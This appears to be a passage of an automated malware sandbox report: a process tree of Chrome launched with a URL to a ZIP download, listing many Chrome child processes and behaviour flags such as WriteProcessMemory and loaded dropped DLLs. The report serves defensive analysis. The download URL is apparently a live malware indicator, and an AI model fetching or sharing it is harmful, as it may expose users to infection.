2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1788 wrote to memory of 1168	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 1168	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 804	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 1244	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 1244	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe
PID 1788 wrote to memory of 632	1788	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://indrani-therapy.com/rulesupdate/NewRules_GQD5.zip
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd38c74f50,0x7ffd38c74f60,0x7ffd38c74f70
2⤵
PID:1168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1672 /prefetch:2
2⤵
PID:804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2028 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2380 /prefetch:8
2⤵
PID:632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
2⤵
PID:100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
2⤵
PID:116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
2⤵
PID:396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4424 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
2⤵
PID:1500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4508 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
2⤵
PID:4036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:8
2⤵
PID:4776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8
2⤵
PID:2264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
2⤵
PID:3920

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level
2⤵
PID:5072

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff7d46da890,0x7ff7d46da8a0,0x7ff7d46da8b0
3⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=808 /prefetch:8
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4524 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 /prefetch:8
2⤵
PID:2864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
2⤵
PID:3556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
2⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1612 /prefetch:1
2⤵
PID:1796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2140 /prefetch:8
2⤵
PID:4136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2628 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3032 /prefetch:8
2⤵
PID:2032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
2⤵
PID:3048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
2⤵
PID:4156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
2⤵
PID:2044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4424 /prefetch:8
2⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
2⤵
PID:1824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
2⤵
PID:4896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:8
2⤵
PID:2276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
2⤵
PID:4048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
2⤵
PID:5076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6260 /prefetch:8
2⤵
PID:2988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:8
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6292 /prefetch:8
2⤵
PID:4264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6408 /prefetch:8
2⤵
PID:408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
2⤵
PID:396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
2⤵
PID:3724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6200 /prefetch:8
2⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6252 /prefetch:8
2⤵
PID:3124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:8
2⤵
PID:4852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6536 /prefetch:8
2⤵
PID:1832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:8
2⤵
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
2⤵
PID:2064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6756 /prefetch:8
2⤵
PID:692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:8
2⤵
PID:384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:8
2⤵
PID:100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
2⤵
PID:3852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6400 /prefetch:8
2⤵
PID:1828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6896 /prefetch:8
2⤵
PID:1100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4998403667392573566,17877905737002820673,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
2⤵
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd38c74f50,0x7ffd38c74f60,0x7ffd38c74f70
3⤵
PID:4164

C:\Program Files\Google\Chrome\Application\chrome.exe
